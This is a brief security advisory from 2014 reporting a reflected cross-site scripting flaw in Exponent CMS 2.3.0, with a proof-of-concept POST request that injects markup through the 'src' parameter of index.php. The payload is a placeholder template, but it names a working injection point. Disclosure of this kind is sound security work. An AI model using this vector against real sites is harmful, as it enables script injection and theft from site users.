Title: 		exponent-2.3.0 CMS index.php POST Reflected XSS
Severity: 	High
CVE-ID: 	To Be Assigned
Release Date:	20 September 2014 
Author: 	Kenneth F. Belva
Websites:	http://silverbackventuresllc.com
		http://xssWarrior.com 
		http://securitymaverick.com
Twitter: 	@infosecmaverick
Contact:	Please use website contact form.
Mail: 
URL: 		http://sourceforge.net/projects/exponentcms/
Vendor: 
Remote Exploit:	Yes

Discovered with: xssWarrior - http://xssWarrior.com

Description:
============

XSS in the src field for on a POST request.


Proof of Concept :
==================


http://[domain]/exponent-2.3.0/exponent-2.3.0/index.php

int=&src="/>[code]<"&controller=search&search=&action=none